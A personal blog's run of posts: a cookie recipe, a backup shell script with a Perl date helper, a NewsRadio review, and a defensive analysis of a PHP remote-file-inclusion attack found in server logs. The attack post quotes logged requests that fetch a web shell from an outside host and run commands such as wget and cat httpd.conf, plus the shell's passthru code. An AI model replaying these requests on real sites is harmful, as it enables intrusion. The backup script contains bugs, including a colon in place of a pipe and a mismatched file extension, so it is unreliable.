I was looking through my cupboards, and in the mood for a sweet snack. I ended up making these; They’re pretty good, and quite easy to make!

What you’ll need:

• 4 tablespoons (half stick) butter or margarine


• 3/4 cup Karo (corn syrup) – I use the light stuff


• 1/2 cup sugar


• 1/2 cup peanut butter (creamy works best)


• 2-1/2 cups rolled oats

How to prepare:

Mix syrup, sugar, and butter in a saucepan. Mix/blend over medium heat until it begins to bubble. Let it cook for two minutes longer. Fold peanut butter into mix, stir until entire mixture is liquidy. Slowly stir in oats; it should get quite difficult towards the end, with barely enough peanut butter mix to seep through. Immediately spoon onto aluminum foil. Let cool, or chill in fridge.

Makes about 2 dozen small (teaspoon) or 1.5 dozen large cookies.

I know it's been forever since I've written anything; I've moved on to 'Real Life' - and it's been a wonderful replacement.

I write this merely as a useful hint to folks who might have a use for this. Several of my new projects are colocated on another system, of which I do not have root access, and do not want to localize installation of GNU utilities, only to have them. One of these being GNU date.

GNU date is much easier to use than BSD date, because, say, if I wanted now - but the month and day of exactly a week ago, I could just say:

date --day="seven days ago" " +%Y.%m.%d"

Not so in BSD. BSD's command line DATE utility will output the time in several formats - one of them being the epoch (%s), but will not allow you to feed it the date in this format, so, for my purposes, it's useless.

I ended up making this throwaway little perl script, which I call *lastweek.pl* (Originally I localized my $time with ARGV[0] to feed it the epoch and have it spit out the date, but honestly, I have no need for that, and this will make things just a touch faster in a few million years of use.)

#!/usr/bin/perl
use warnings;
use strict;
my ($sec, $min, $hour, $day, $month, $year, $wday, $yday, $isdst) = localtime(time() - 604800); # 604800 is 7 days in seconds.
$year += 1900;
$month += 1;
printf("%04d.%02d.%02d\n", $year, $month, $day);

What this script does is print out the year.month.day, in the same format which I store the local date (today) in my shell script. Today's date is obtained:

TODAY=`date +%Y.%m.%d`

So, to use this:

LASTWEEK=`/usr/bin/perl $HOME/bin/lastweek.pl`

Now, for the (horrible, horrible) script. Many of these things aren't commented, because they're a waste of resources (using 'tr' to print the domain in uppercase, an abuse of pipes, etc). However, my goal was to make a script that will work anywhere that has tar, gzip and the most basic system tools. (Perl is a requirement for the old file removal process, but virtually all systems have Perl 5 by now):

#!/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin:/sbin
DESTDIR=$HOME/backup
FAILED=`false`
DATE=`date +%Y.%m.%d`
LASTWEEK=`/usr/bin/perl $HOME/bin/lastweek.pl`
SITES=`for n in $HOME/hosted/www.*.com; do echo $n; done` #Dumb, but gives us a space delimited array, no globbing required, and no thrashing with find.
echo "Backing up hosted sites on $DATE, "`date +%H:%M`"."
echo ""
for HOST in $SITES; do
  DOMAIN=`basename $HOST | sed s,'www.','',g`
  echo -n '>> '`echo $DOMAIN | tr '[a-z]' '[A-Z]'`': '
  tar cPf - $HOST : gzip -9 > "$DESTDIR/$DOMAIN-$DATE.tar.gz"
  if [ $? != 0 ]; then
    echo "FAILED!"
    FAILED=`true`
  else
    echo -n "done."
    if [ -f "$DESTDIR/$DOMAIN-$LASTWEEK.tar.gz" ]; then
      rm -r "$DESTDIR/$DOMAIN-$LASTWEEK.tar.gz2"
      echo -n " Removed last week's backup."
    fi
   echo ""
  fi
done
echo ""
if [ $FAILED == `true` ]; then
  exit 1
fi

So, yeah... That's it! If you need something simple that cleans up after itself - you can either install GNU's date for your shell needs, or do as I did, and abuse Perl. ;)

NewsRadio was probably the funniest show I’ve ever enjoyed. The timing, cynicism, and internal struggles made it so… well, in a word: brilliant.

The (albient dated, but by design) cultural references from Soylent Green to Flowers for Algernon only made the witty dialog all the more relevant, somehow. You see that these young adults are entering their careeer paths, and still have (at least most of) their personalities intact. If you don’t like thinking, or a bit of slapstick humor, you won’t enjoy NewsRadio – however, even my mother has learned to enjoy the show – so much that she “borrowed” my DVDs (which I doubt I’ll have returned..) Paul Simms created magic.. in the time of grunge music.

Season 3 is finally on DVD. In this season, the characters have really grown into their personas, and the story lines are fresh, and exciting. The commentaries are generally a bit weak, but still quite enjoyable – I only wish they’d tell us what the ‘secret lyrics’ are that they made to go with Mike Post’s theme music! (Ok, I’d also pay $20 more per DVD set if there was no laugh track.. that annoys the heck out of me.)

In related news, I’ve purchased a WNYX mug. Yes, I love this show; nearly as much as these folks seem to.

While browsing my logs today, I discovered someone attempting to exploit PHP’s fopen() support for URLs , This specific form of expoit dates back to at least 2003.

The relevent information (from the cached page above – it doesn’t work here, so all you’d see was the first negated attempt):

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=wget%20http://www.havenard.net/havenard/4843term.txt HTTP/1.1”

“GET
/index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?
&chdir=/somewhere/writeable&cmd=mv%204843term.txt%20terminal.php HTTP/1.1”

So, I looked at the script that was being linked to (as a text file, from a Geocities site; which still has ‘blocking’ disabled for text files – for some legacy reason). Below follows some of the code:

if (!empty($cmd)) { @passthru(”$cmd 2>&1”); $output = ob_get_contents(); if (!empty($output)) echo str_replace(”>”, ”>”, str_replace(”<”, ”<”, $output)); }

As you can see, this script is essentially just a wrapper for exec, using the syntax of a few parameters passed within $_GET[“cmd”].. only, not quite that smart.

It’s incredibly simple, old, and, well, sadly quite effective – many people still don’t secure their site, and blindly write code which works as the following:

if ( ! $var ) $var = “var”;
require(”$var.html”);

The above code is beyond bad. For one, it doesn’t define a local path, which could easily be fixed with:

require(”./$var.html”); (although, I still don’t agree with this method – and this STILL isn’t failsafe.)

I hate global variables, but once you parse your config, you can read the whole thing into an array of a single variable, which you don’t expose – except where you have to.

This is also pretty messy: It allows you to only access one global variable; however, it discloses everything in it’s array, which I consider to be bogus.

Protip: If you don’t need to open files from an external site (which you shouldn’t need to do.. and if you do, use sockets, or a PEAR library), turn off url access in fopen(). This is configurable in php.ini.

I’ve moved from my hosting with ICDSoft in China to ICDSoft’s USA colocation.

Things were updated in nameservice by myself in parallel with the move; anyone who cached (viewed) my page within the last few hours may have up to 48 hours until it updates on their ISP’s nameserver, but there IS a forward in place to the new location with an alternative name – CSS will be broken, and the site will be ugly, but it will still be functional.

Thanks for your swift, excellent service, ICDSoft .

[Update: Everything should be seeing the ‘new’ host, and yes, it may appear ‘faster’.]